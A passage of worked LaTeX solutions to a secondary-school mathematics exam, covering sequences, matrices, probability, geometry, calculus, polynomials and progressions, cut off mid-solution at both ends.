\ \ \ \ \ \ \ \ ={}^{{10}}{{C}_{5}}{{\left( {{{x}^{2}}} \right)}^{{10-5}}}{{\left( {-2y} \right)}^{5}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{10\times 9\times 8\times 7\times 6}}{{1\times 2\times 3\times 4\times 5}}{{x}^{{10}}}\left( {-32{{y}^{5}}} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =-8064{{x}^{{10}}}{{y}^{5}}\end{array}$ 2(b).     In a sequence if $u_1=1$ and $u_{n+1}=u_n+3(n+1)$, find $u_5$ . (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}{{u}_{1}}=1,\ {{u}_{{n+1}}}={{u}_{n}}+3(n+1)\\[2ex]\therefore {{u}_{2}}={{u}_{{1+1}}}={{u}_{1}}+3(1+1)=1+6=7\\[2ex]\ \ \ {{u}_{3}}={{u}_{{2+1}}}={{u}_{2}}+3(2+1)=7+9=16\\[2ex]\ \ \ {{u}_{4}}={{u}_{{3+1}}}={{u}_{3}}+3(3+1)=16+12=28\\[2ex]\ \ \ {{u}_{5}}={{u}_{{4+1}}}={{u}_{4}}+3(4+1)=28+15=43\end{array}$ 3(a).     If $\displaystyle P=\left( {\begin{array}{*{20}{c}} x & {-4} \\ {8-y} & {-9} \end{array}} \right)$ and $\displaystyle {{P}^{{-1}}}=\left( {\begin{array}{*{20}{c}} {-3x} & 4 \\ {-7y} & 3 \end{array}} \right)$, find the values of $x$ and $y$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}P=\left( {\begin{array}{*{20}{c}} x & {-4} \\[2ex] {8-y} & {-9} \end{array}} \right),\ {{P}^{{-1}}}=\left( {\begin{array}{*{20}{c}} {-3x} & 4 \\[2ex] {-7y} & 3 \end{array}} \right)\\[2ex]\text{Since}\ P{{P}^{{-1}}}=I,\\[2ex]\left( {\begin{array}{*{20}{c}} x & {-4} \\[2ex] {8-y} & {-9} \end{array}} \right)\left( {\begin{array}{*{20}{c}} {-3x} & 4 \\[2ex] {-7y} & 3 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)\\[2ex]\left( {\begin{array}{*{20}{c}} {-3{{x}^{2}}+28y} & {4x-12} \\[2ex] {-24x+3xy+63y} & {5-4y} \end{array}} \right)=\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)\\[2ex]\therefore -3{{x}^{2}}+28y=1\Rightarrow y=\displaystyle \frac{{3{{x}^{2}}+1}}{{28}}\\[2ex]\ \ \ 4x-12=0\Rightarrow x=3\\[2ex]\ \ -24x+3xy+63y=0\\[2ex]\ \ \ 5-4y=1\Rightarrow y=1\\[2ex]\therefore \ x=3\ \text{and}\ y=1.\end{array}$ 3(b).     A bag contains tickets, numbered $11, 12, 13, ...., 30$. A ticket is taken out from the bag at random. Find the probability that the number on the drawn ticket is (i) a multiple of $7$ (ii) greater than $15$ and a multiple of $5$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Set of possible outcomes}\ =\{11,\ 12,\ 13,\ ...,\ 30\}\\[2ex]\text{Number of possible outcomes}\ =20\\[2ex]\text{Set of favourable outcomes}\ \text{for a number }\\[2ex]\text{multiple of 7= }\!\!\{\!\!\text{ 14,}\ \text{21,}\ \text{28 }\!\!\}\!\!\text{ }\\[2ex]\text{Number of favourable outcomes}\ =3\\[2ex]P(\text{a number multiple of 7)}=\displaystyle \frac{3}{{20}}\\[2ex]\text{Set of favourable outcomes}\ \text{for a number }\\[2ex]\text{greater than 15 and a multiple of 5 = }\!\!\{\!\!\text{ }\ \text{20,}\ \text{25,}\ \text{30 }\!\!\}\!\!\text{ }\\[2ex]\text{Number of favourable outcomes}\ =3\\[2ex]P(\text{a number greater than 15 and amultiple of 5)}=\displaystyle \frac{3}{{20}}\end{array}$ 4(a).     Draw a circle and a tangent $TAS$ meeting it at $A$. Draw a chord $AB$ making $\displaystyle \angle TAB=\text{ }60{}^\circ$ and another chord $BC \parallel TS$. Prove that $\triangle ABC$ is equilateral. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Since}\ BC\parallel TS,\\[2ex]\ \ \ \beta =\angle TAB\ \ \ [\text{alternating }\angle \text{s }\!\!]\!\!\text{ }\\[2ex]\therefore \beta =60{}^\circ \\[2ex]\ \ \ \gamma =\angle TAB\ \ \ [\angle \text{ between tangent and chord}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \text{ }\text{=}\angle \ \text{in alternate segment }\!\!]\!\!\text{ }\\[2ex]\therefore \gamma =60{}^\circ \\[2ex]\text{Since}\ \alpha +\beta +\gamma =180{}^\circ ,\\[2ex]\alpha =180{}^\circ -(\beta +\gamma )\\[2ex]\alpha =180{}^\circ -(60{}^\circ +60{}^\circ )\\[2ex]\therefore \alpha =60{}^\circ \\[2ex]\therefore \alpha =\beta =\gamma \\[2ex]\therefore \ \triangle ABC\ \text{is equilateral}\text{.}\end{array}$ 4(b).     If $\displaystyle 3~\overrightarrow{{OA}}-2\overrightarrow{{OB}}-\overrightarrow{{OC}}~=\vec{0}$, show that the points $A, B$ and $C$ are collinear. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\ \ \ 3~\overrightarrow{{OA}}-2\overrightarrow{{OB}}-\overrightarrow{{OC}}~=\vec{0}\\[2ex]\therefore 2~\overrightarrow{{OA}}-2\overrightarrow{{OB}}+\overrightarrow{{OA}}-\overrightarrow{{OC}}~=\vec{0}\\[2ex]\ \ \ 2~\left( {\overrightarrow{{OA}}-\overrightarrow{{OB}}} \right)+\left( {\overrightarrow{{OA}}-\overrightarrow{{OC}}} \right)~=\vec{0}\\[2ex]\ \ \ 2\overrightarrow{{BA}}+\overrightarrow{{CA}}=\vec{0}\\[2ex]\therefore 2\overrightarrow{{BA}}=-\overrightarrow{{CA}}\\[2ex]\therefore 2\overrightarrow{{BA}}=\overrightarrow{{AC}}\\[2ex]\therefore \ A,\ B\ \text{and }C\ \text{are collinear}\text{.}\end{array}$ 5(a).     Solve the equation $2 \sin x \cos x -\cos x + 2\sin x - 1 = 0$ for $\displaystyle 0{}^\circ \le x\le \text{ }360{}^\circ$. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{For}\ 0{}^\circ \le x\le \text{ }360{}^\circ ,\\[2ex]2\sin x\cos x-\cos x+2\sin x-1=0\\[2ex]\cos x\left( {2\sin x-1} \right)+\left( {2\sin x-1} \right)=0\\[2ex]\left( {2\sin x-1} \right)\left( {\cos x+1} \right)=0\\[2ex]\therefore \sin x=\displaystyle \frac{1}{2}\ \text{or}\ \cos x=-1\\[2ex](\text{i})\ \sin x=\displaystyle \frac{1}{2}\\[2ex]\ \ \ \ x=30{}^\circ \ \text{or}\ x=150{}^\circ \\[2ex](\text{ii})\ \cos x=-1\\[2ex]\ \ \ \ \ x=180{}^\circ \\[2ex]\therefore x=30{}^\circ \ \text{or}\ x=150{}^\circ \ \text{or}\ x=180{}^\circ \end{array}$ 5(b).     Differentiate $\displaystyle y=\frac{1}{{\sqrt[3]{x}}}$ from the first principles. (3 marks) Show/Hide Solution $\displaystyle \begin{array}{l}y=\displaystyle \frac{1}{{\sqrt[3]{x}}}\\[2.5ex]y+\delta y=\displaystyle \frac{1}{{\sqrt[3]{{x+\delta x}}}}\\[2.5ex]\delta y=\displaystyle \frac{1}{{\sqrt[3]{{x+\delta x}}}}-\displaystyle \frac{1}{{\sqrt[3]{x}}}\\[2.5ex]\delta y=\displaystyle \frac{{\sqrt[3]{x}-\sqrt[3]{{x+\delta x}}}}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\\[2.5ex]\displaystyle \frac{{\delta y}}{{\delta x}}=\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{\sqrt[3]{x}-\sqrt[3]{{x+\delta x}}}}{{\delta x}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{\sqrt[3]{x}-\sqrt[3]{{x+\delta x}}}}{{x+\delta x-x}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{\sqrt[3]{x}-\sqrt[3]{{x+\delta x}}}}{{{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{3}}-{{{\left( {\sqrt[3]{x}} \right)}}^{3}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{-\left( {\sqrt[3]{{x+\delta x}}-\sqrt[3]{x}} \right)}}{{{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{3}}-{{{\left( {\sqrt[3]{x}} \right)}}^{3}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{-\left( {\sqrt[3]{{x+\delta x}}-\sqrt[3]{x}} \right)}}{{\left( {\sqrt[3]{{x+\delta x}}-\sqrt[3]{x}} \right)\left[ {{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{2}}+\left( {\sqrt[3]{{x+\delta x}}} \right)\left( {\sqrt[3]{x}} \right)+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}} \right]}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{-1}}{{{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{2}}+\left( {\sqrt[3]{{x+\delta x}}} \right)\left( {\sqrt[3]{x}} \right)+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\\[2.5ex]\displaystyle \frac{{dy}}{{dx}}=\underset{{\delta x\to 0}}{\mathop{{\lim }}}\,\displaystyle \frac{{\delta y}}{{\delta x}}\\[2.5ex]\ \ \ \ \ =\underset{{\delta x\to 0}}{\mathop{{\lim }}}\,\left[ {\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{{x+\delta x}}}}\cdot \displaystyle \frac{{-1}}{{{{{\left( {\sqrt[3]{{x+\delta x}}} \right)}}^{2}}+\left( {\sqrt[3]{{x+\delta x}}} \right)\left( {\sqrt[3]{x}} \right)+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}} \right]\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{\sqrt[3]{x}\sqrt[3]{x}}}\cdot \displaystyle \frac{{-1}}{{{{{\left( {\sqrt[3]{x}} \right)}}^{2}}+\left( {\sqrt[3]{x}} \right)\left( {\sqrt[3]{x}} \right)+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{1}{{{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\cdot \displaystyle \frac{{-1}}{{{{{\left( {\sqrt[3]{x}} \right)}}^{2}}+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}+{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{{-1}}{{3\cdot {{{\left( {\sqrt[3]{x}} \right)}}^{2}}{{{\left( {\sqrt[3]{x}} \right)}}^{2}}}}\\[2.5ex]\ \ \ \ \ =\displaystyle \frac{{-1}}{{3\cdot {{{\left( {\sqrt[3]{x}} \right)}}^{4}}}}\\[2.5ex]\ \ \ \ \ \end{array}$ SECTION (B) (Answer Any FOUR questions.) 6 (a).    Given that Given $\displaystyle A=\{x\in R|\ x\ne -\frac{1}{2},x\ne \frac{3}{2}\}$. If $f:A\to A$ and $g:A\to A$ are defined by $f(x)=\displaystyle \frac{3x-5}{2x+1}$ and $g(x)=\displaystyle \frac{x+5}{3-2x}$, show that $f$ and $g$ are inverse of each other. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\begin{array}{c|c} { \displaystyle \begin{array}{l}A=\{x\in R|\ x\ne -\displaystyle \frac{1}{2},x\ne \displaystyle \frac{3}{2}\}\\[2ex]f:A\to A,f(x)=\displaystyle \frac{{3x-5}}{{2x+1}}\\[2ex]g:A\to A,g(x)=\displaystyle \frac{{x+5}}{{3-2x}}\\[2ex](f\cdot g)(x)=f\left( {g(x)} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =f\left( {\displaystyle \frac{{x+5}}{{3-2x}}} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{3\left( {\displaystyle \frac{{x+5}}{{3-2x}}} \right)-5}}{{2\left( {\displaystyle \frac{{x+5}}{{3-2x}}} \right)+1}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\displaystyle \frac{{3x+15-15+10x}}{{3-2x}}}}{{\displaystyle \frac{{2x+10+3-2x}}{{3-2x}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\displaystyle \frac{{13x}}{{3-2x}}}}{{\displaystyle \frac{{13}}{{3-2x}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =x\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =I(x)\end{array}} & { \displaystyle \begin{array}{l}(g\cdot f)(x)=g\left( {f(x)} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =g\left( {\displaystyle \frac{{3x-5}}{{2x+1}}} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\left( {\displaystyle \frac{{3x-5}}{{2x+1}}} \right)+5}}{{3-2\left( {\displaystyle \frac{{3x-5}}{{2x+1}}} \right)}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\displaystyle \frac{{3x-5+10x+5}}{{2x+1}}}}{{\displaystyle \frac{{6x+3-6x+10}}{{2x+1}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =\displaystyle \frac{{\displaystyle \frac{{13x}}{{2x+1}}}}{{\displaystyle \frac{{13}}{{2x+1}}}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =x\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ =I(x)\\[2ex]\therefore (f\cdot g)(x)=(g\cdot f)(x)=I(x)\\[2ex]\therefore f={{g}^{{-1}}}\ \text{and}\ g={{f}^{{-1}}}\end{array}}\end{array}\end{array}$ 6 (b).     Given that $x^5 + ax^3 + bx^2 - 3 = (x^2 - 1) Q(x) - x - 2$, where $Q(x)$ is a polynomial. State the degree of $Q (x)$ and find the values of $a$ and $b$. Find also the remainder when $Q (x)$ is divided by $x + 2$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}{{x}^{5}}+a{{x}^{3}}+b{{x}^{2}}-3=({{x}^{2}}-1)Q(x)-x-2\\[2ex]{{x}^{5}}+a{{x}^{3}}+b{{x}^{2}}+x-1=({{x}^{2}}-1)Q(x)\\[2ex]\text{degree}\ \text{of }Q\left( x \right)=3\\[2ex]{{x}^{5}}+a{{x}^{3}}+b{{x}^{2}}+x-1=({{x}^{2}}-1)Q(x)\\[2ex]{{x}^{5}}+a{{x}^{3}}+b{{x}^{2}}+x-1=(x-1)(x+1)Q(x)\\[2ex]\text{When}\ x=1\\[2ex]1+a+b+1-1=(1-1)(1+1)Q(x)\\[2ex]1+a+b=0\\[2ex]a+b=-1\ -------(1)\\[2ex]\text{When}\ x=-1\\[2ex]-1-a+b-1-1=(-1-1)(-1+1)Q(x)\\[2ex]-3-a+b=0\\[2ex]-a+b=3\ \ \ ------(2)\\[2ex](1)+(2)\Rightarrow 2b=2\Rightarrow b=1\\[2ex](1)-(2)\Rightarrow 2a=-4\Rightarrow a=-2\\[2ex]{{x}^{5}}-2{{x}^{3}}+{{x}^{2}}+x-1=({{x}^{2}}-1)Q(x)\\[2ex]\therefore Q(x)=\displaystyle \frac{{{{x}^{5}}-2{{x}^{3}}+{{x}^{2}}+x-1}}{{{{x}^{2}}-1}}\\[2ex]\text{When }Q(x)\text{ is divided by }x+2\text{, }\\[2ex]\text{the remainder is }Q(-2).\\[2ex]\therefore Q(-2)=\displaystyle \frac{{{{{(-2)}}^{5}}-2{{{(-2)}}^{3}}+{{{(-2)}}^{2}}+(-2)-1}}{{{{{(-2)}}^{2}}-1}}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ =-5\end{array}$ 7 (a).     The binary operation $\odot$ on $R$ be defined by $x\odot y=x+y+10xy$ Show that the binary operation is commutative. Find the values $b$ such that $(1\odot b)\odot b=485$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}x\odot y=x+y+10xy\\[2ex]y\odot x=y+x+10yx\\[2ex]\ \ \ \ \ \ \ \ =x+y+10xy\\[2ex]\therefore x\odot y=y\odot x\\[2ex]\therefore \ \text{The binary operation is commutative}\text{.}\\[2ex]1\odot b=1+b+10b\\[2ex](1\odot b)\odot b=(1+b+10b)\odot b\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =(1+b+10b)+b+10(1+b+10b)b\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+22b+110{{b}^{2}}\\[2ex](1\odot b)\odot b=485\\[2ex]1+22b+110{{b}^{2}}=485\\[2ex]110{{b}^{2}}+22b-484=0\\[2ex]5{{b}^{2}}+b-22=0\\[2ex](5b+11)(b-2)=0\\[2ex]b=-\displaystyle \frac{{11}}{5}\ \text{or}\ b=2\end{array}$ 7 (b).     If, in the expansion of $(1 + x)^m (1 - x)^n$, the coefficient of $x$ and $x^2$ are $-5$ and $7$ respectively, then find the value of $m$ and $n$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}{{(1+x)}^{m}}{{(1-x)}^{n}}=\left( {1+{}^{m}{{C}_{1}}x+{}^{m}{{C}_{2}}{{x}^{2}}+...} \right)\left( {1-{}^{n}{{C}_{1}}x+{}^{n}{{C}_{2}}{{x}^{2}}+...} \right)\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+\left( {{}^{m}{{C}_{1}}-{}^{n}{{C}_{1}}} \right)x+\left( {{}^{m}{{C}_{2}}-{}^{m}{{C}_{1}}{}^{n}{{C}_{1}}+{}^{n}{{C}_{2}}} \right){{x}^{2}}+...\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+\left( {m-n} \right)x+\left( {\displaystyle \frac{{m(m-1)}}{2}-mn+\displaystyle \frac{{n(n-1)}}{2}} \right){{x}^{2}}+...\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+\left( {m-n} \right)x+\left( {\displaystyle \frac{{{{m}^{2}}-2mn+{{n}^{2}}-(m+n)}}{2}} \right){{x}^{2}}+...\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ =1+\left( {m-n} \right)x+\left( {\displaystyle \frac{{{{{(m-n)}}^{2}}-(m+n)}}{2}} \right){{x}^{2}}+...\\[2ex]\text{By the problem,}\\[2ex]\ \ \ \ m-n=-5\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ------(1)\\[2ex]\ \ \ \displaystyle \frac{{{{{(m-n)}}^{2}}-(m+n)}}{2}=7\\[2ex]\therefore \displaystyle \frac{{{{{(-5)}}^{2}}-(m+n)}}{2}=7\\[2ex]\ \ \ 25-(m+n)=14\\[2ex]\ \ \ m+n=11\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ------(2)\\[2ex](1)+(2)\Rightarrow 2m=6\Rightarrow m=3\\[2ex](1)-(2)\Rightarrow -2n=-16\Rightarrow n=8\end{array}$ 8 (a).     Find the solution set in $R$ for the inequation $2x (x + 2)\ge (x + 1) (x + 3)$ and illustrate it on the number line. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}2x(x+2)\ge (x+1)(x+3)\\[2ex]2{{x}^{2}}+4x\ge {{x}^{2}}+4x+3\\[2ex]{{x}^{2}}-3\ge 0\\[2ex]\left( {x+\sqrt{3}} \right)\left( {x-\sqrt{3}} \right)\ge 0\\[2ex]\left( {x+\sqrt{3}\ge 0\ \text{and}\ x-\sqrt{3}\ge 0} \right)\ \text{or}\ \left( {x+\sqrt{3}\le 0\ \text{and}\ x-\sqrt{3}\le 0} \right)\ \\[2ex]\left( {x\ge -\sqrt{3}\ \text{and}\ x\ge \sqrt{3}} \right)\ \text{or}\ \left( {x\le -\sqrt{3}\ \text{and}\ x\le \sqrt{3}} \right)\ \\[2ex]\therefore x\ge \sqrt{3}\ \text{or}\ x\le -\sqrt{3}\\[2ex]\therefore \ \text{Solution Set = }\left\{ {x\ |\ x\le -\sqrt{3}\ \text{or}\ x\ge \sqrt{3}} \right\}\\[2ex]\text{Number Line}\end{array}$ 8 (b).     If the ${{m}^{{\text{th}}}}$ term of an A.P. is $\displaystyle \frac{1}{n}$ and ${{n}^{{\text{th}}}}$ term is $\displaystyle \frac{1}{m}$ where $m\ne n$, then show that $u_{mn} = 1$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Let the first and the common difference }\\[2ex]\text{of the give A}\text{.P}\text{. be }a\ \text{and }d\ \text{respectively}\text{.}\\[2ex]\text{By the problem,}\\[2ex]{{u}_{m}}=\displaystyle \frac{1}{n}\\[2ex]a+(m-1)d=\displaystyle \frac{1}{n}\\[2ex]na+mnd-nd=1\ \ \ \ \ \ -----(1)\\[2ex]{{u}_{n}}=\displaystyle \frac{1}{m}\\[2ex]a+(n-1)d=\displaystyle \frac{1}{m}\\[2ex]ma+mnd-md=1\ \ \ \ -----(2)\\[2ex](1)-(2)\Rightarrow a(n-m)-(n-m)d=0\\[2ex]\therefore (n-m)(a-d)=0\\[2ex]\text{Since}\ m\ne n,n-m\ne 0.\\[2ex]\therefore a-d=0\Rightarrow a=d\\[2ex]\text{By equation (2), }\\[2ex]am+mnd-md=1\ \Rightarrow mnd=1\Rightarrow mna=1\\[2ex]\therefore {{u}_{{mn}}}=a+(mn-1)d\\[2ex]\ \ \ \ \ \ \ \ =d+mnd-d\\[2ex]\ \ \ \ \ \ \ \ =1\end{array}$ 9 (a).     The sum of the first two terms of a geometric progression is $12$ and the sum of the first four terms is $120$. Calculate the two possible values of the fourth term in the progression. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\text{Let the first and the common ratio }\\[2ex]\text{of the give G}\text{.P}\text{. be }a\ \text{and }r\ \text{respectively}\text{.}\\[2ex]\text{By the problem,}\\[2ex]{{u}_{1}}+{{u}_{2}}=12\\[2ex]a+ar=12\\[2ex]a\left( {1+r} \right)=12\ \ \ \ \ \ \ -----(1)\\[2ex]{{u}_{1}}+{{u}_{2}}+{{u}_{3}}+{{u}_{4}}=120\\[2ex]12+{{u}_{3}}+{{u}_{4}}=120\\[2ex]{{u}_{3}}+{{u}_{4}}=108\\[2ex]a{{r}^{2}}+a{{r}^{3}}=108\\[2ex]a{{r}^{2}}\left( {1+r} \right)=108-----(2)\\[2ex]\therefore \displaystyle \frac{{a{{r}^{2}}\left( {1+r} \right)}}{{a\left( {1+r} \right)}}=\displaystyle \frac{{108}}{{12}}\\[2ex]\ \ \ {{r}^{2}}=9\Rightarrow r=\pm 3\\[2ex]\text{When}\ r=-3,\ a\left( {1-3} \right)=12\ \Rightarrow -6\\[2ex]\therefore {{u}_{4}}=a{{r}^{3}}=-6{{(-3)}^{3}}=162\\[2ex]\text{When}\ r=3,\ a\left( {1+3} \right)=12\ \Rightarrow 3\\[2ex]\therefore {{u}_{4}}=a{{r}^{3}}=3{{(3)}^{3}}=81\end{array}$ 9 (b).     Given that $A=\left( {\begin{array}{*{20}{c}} {\cos \theta } & {-\sin \theta } \\ {\sin \theta } & {\cos \theta } \end{array}} \right)$. If $A + A' = I$ where $I$ is a unit matrix of order $2$, find the value of $\theta$ for $\displaystyle 0{}^\circ <\theta <90{}^\circ$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}A=\left( {\begin{array}{*{20}{c}} {\cos \theta } & {-\sin \theta } \\[2ex] {\sin \theta } & {\cos \theta } \end{array}} \right)\\[2ex]{A}'=\left( {\begin{array}{*{20}{c}} {\cos \theta } & {\sin \theta } \\[2ex] {-\sin \theta } & {\cos \theta } \end{array}} \right)\\[2ex]\text{By the problem,}\\[2ex]A+{A}'=I\\[2ex]\left( {\begin{array}{*{20}{c}} {\cos \theta } & {-\sin \theta } \\[2ex] {\sin \theta } & {\cos \theta } \end{array}} \right)+\left( {\begin{array}{*{20}{c}} {\cos \theta } & {\sin \theta } \\[2ex] {-\sin \theta } & {\cos \theta } \end{array}} \right)=\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)\\[2ex]\left( {\begin{array}{*{20}{c}} {2\cos \theta } & 0 \\[2ex] 0 & {2\cos \theta } \end{array}} \right)=\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)\\[2ex]\therefore 2\cos \theta =1\\[2ex]\ \ \ \cos \theta =\displaystyle \frac{1}{2}\\[2ex]\ \ \ \theta =60{}^\circ \end{array}$ 10 (a).   The matrix $A$ is given by $\displaystyle A=\left( {\begin{array}{*{20}{c}} 2 & 3 \\ 4 & 5 \end{array}} \right)$. (a) Prove that $A^2 = 7A + 2I$ where $I$ is the unit matrix of order $2$. (b) Hence, show that $\displaystyle {{A}^{{-1}}}=\frac{1}{2}~\left( {A-7I} \right)$. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}A=\left( {\begin{array}{*{20}{c}} 2 & 3 \\[2ex] 4 & 5 \end{array}} \right)\\[2ex]{{A}^{2}}=\left( {\begin{array}{*{20}{c}} 2 & 3 \\[2ex] 4 & 5 \end{array}} \right)\left( {\begin{array}{*{20}{c}} 2 & 3 \\[2ex] 4 & 5 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {2\times 2+3\times \;4} & {2\times \;3+3\times \;5} \\[2ex] {4\times \;2+5\times \;4} & {4\times \;3+5\times \;5} \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {16} & {21} \\[2ex] {28} & {37} \end{array}} \right)\\[2ex]7A+2I=7\left( {\begin{array}{*{20}{c}} 2 & 3 \\[2ex] 4 & 5 \end{array}} \right)+2\left( {\begin{array}{*{20}{c}} 1 & 0 \\[2ex] 0 & 1 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {14} & {21} \\[2ex] {28} & {35} \end{array}} \right)+\left( {\begin{array}{*{20}{c}} 2 & 0 \\[2ex] 0 & 2 \end{array}} \right)=\left( {\begin{array}{*{20}{c}} {16} & {21} \\[2ex] {28} & {37} \end{array}} \right)\\[2ex]\therefore {{A}^{2}}=7A+2I\\[2ex]\therefore A\cdot A\cdot {{A}^{{-1}}}=7A\cdot {{A}^{{-1}}}+2I\cdot {{A}^{{-1}}}\\[2ex]\therefore A\cdot I=7I+2{{A}^{{-1}}}\\[2ex]\therefore A=7I+2{{A}^{{-1}}}\\[2ex]\therefore 2{{A}^{{-1}}}=A-7I\\[2ex]\therefore {{A}^{{-1}}}=\displaystyle \frac{1}{2}\left( {A-7I} \right)\end{array}$ 10 (b).   Draw a tree diagram to list all possible outcomes when four fair coins are tossed simultaneously. Hence determine the probability of getting: (a) all heads, (b) two heads and two tails, (c) more tails than heads, (d) at least one tail, (e) exactly one head. (5 marks) Show/Hide Solution $\displaystyle \begin{array}{l}\therefore \ \ \text{Number of possible outcomes}\ =16\\[2ex](\text{i})\ \text{The set of favourable outcomes for getting all heads}\ \text{=}\left\{ {(H,H,H,H)} \right\}\\[2ex]\ \ \ \ \text{Number of favourable outcomes = 1}\\[2ex]\ \ \ \ P\text{ (getting all heads) =}\displaystyle \frac{1}{{16}}\\[2ex](\text{ii})\ \text{The set of favourable outcomes for getting two heads and two tails}\\[2ex]\ \ \ \ \ \text{=}\left\{ {(H,H,T,T),\text{ }(H,T,H,T),\text{ }(H,T,T,H),\text{ }(T,H,H,T),\text{ }(T,H,T,H),\text{ }(T,T,H,H)} \right\}\\[2ex]\ \ \ \ \text{Number of favourable outcomes = 6}\\[2ex]\ \ \ \ P\text{ (getting two heads and two tails) =}\displaystyle \frac{6}{{16}}=\displaystyle \frac{3}{8}\\[2ex](\text{iii})\ \text{The set of favourable outcomes for getting more tails than heads}\\[2ex]\ \ \ \ \ \text{=}\left\{ {(H,T,T,T),\text{ }(T,H,T,T),\text{ }(T,T,H,T),\text{ }(T,T,T,H)} \right\}\\[2ex]\ \ \ \ \text{Number of favourable outcomes = 4}\\[2ex]\ \ \ \ P\text{ (getting more tails than heads) =}\displaystyle \frac{4}{{16}}=\displaystyle \frac{1}{4}\\[2ex](\text{iv})\ P\text{ (getting at least one tail)}=1-P\text{ (no tail)}\\[2ex]\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ 